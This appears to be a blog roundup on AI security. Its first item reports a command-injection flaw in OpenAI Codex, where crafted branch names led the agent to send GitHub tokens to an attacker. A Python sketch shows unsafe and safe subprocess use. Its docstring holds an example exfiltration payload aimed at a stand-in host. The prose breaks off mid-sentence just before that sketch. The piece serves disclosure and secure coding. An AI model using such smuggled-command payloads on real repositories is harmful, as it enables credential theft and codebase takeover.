
This Week in AI Security: OpenAI Codex Hacked, LiteLLM Supply Chain Attack, Claude Gets Computer Control
This was the week AI security stopped being theoretical. Three events, all within days of each other, paint a picture that every developer building with AI tools needs to understand.

1. OpenAI Codex: Command Injection via Branch Names

BeyondTrust's Phantom Labs team (Tyler Jespersen) found a critical vulnerability in OpenAI Codex affecting all Codex users.

The attack: command injection through GitHub branch names in task creation requests. An attacker could craft a malicious branch name that, when processed by Codex, would exfiltrate a victim's GitHub tokens to an attacker-controlled server.

The impact: full read/write access to a victim's entire codebase. Lateral movement across repositories. Everything.

OpenAI patched it quickly. But the pattern is what matters: AI coding tools inherit trust from user context (GitHub tokens, env vars, API keys) but don't treat that context as a security boundary. Every AI coding tool that touches git has this same attack surface. Basically nobody is
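To make the vulnerability class concrete, here is a minimal, hedged sketch of the pattern described above — not OpenAI's actual code. It assumes an agent that interpolates an attacker-controlled branch name into a shell command; `echo` stands in for the real git invocation so the demo is safely runnable, and the payload shown is benign.

```python
import subprocess

# Sketch of the vulnerability class, NOT OpenAI's implementation.
# 'echo' stands in for something like 'git fetch origin <branch>' so the
# injected payload is harmless and the demo can run anywhere.

def process_branch_unsafe(branch: str) -> str:
    """Interpolates attacker-controlled input into a shell string.

    A branch name like 'main; curl https://evil.example/$GITHUB_TOKEN'
    would make the shell run the injected command with the agent's
    credentials -- the exfiltration pattern described in the article.
    """
    result = subprocess.run(f"echo {branch}", shell=True,
                            capture_output=True, text=True)
    return result.stdout

def process_branch_safe(branch: str) -> str:
    """Passes the branch name as a single argv element.

    With no shell involved, the whole string is one literal argument;
    shell metacharacters in the branch name are never interpreted.
    """
    result = subprocess.run(["echo", branch],
                            capture_output=True, text=True)
    return result.stdout

payload = "main; echo INJECTED"  # a branch name carrying a shell payload
```

The fix is the boundary the article calls for: treat branch names as untrusted data, never as command text — pass them as discrete argv elements (and validate them, e.g. against `git check-ref-format` rules) before they ever reach a subprocess.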
Continue reading on Dev.to



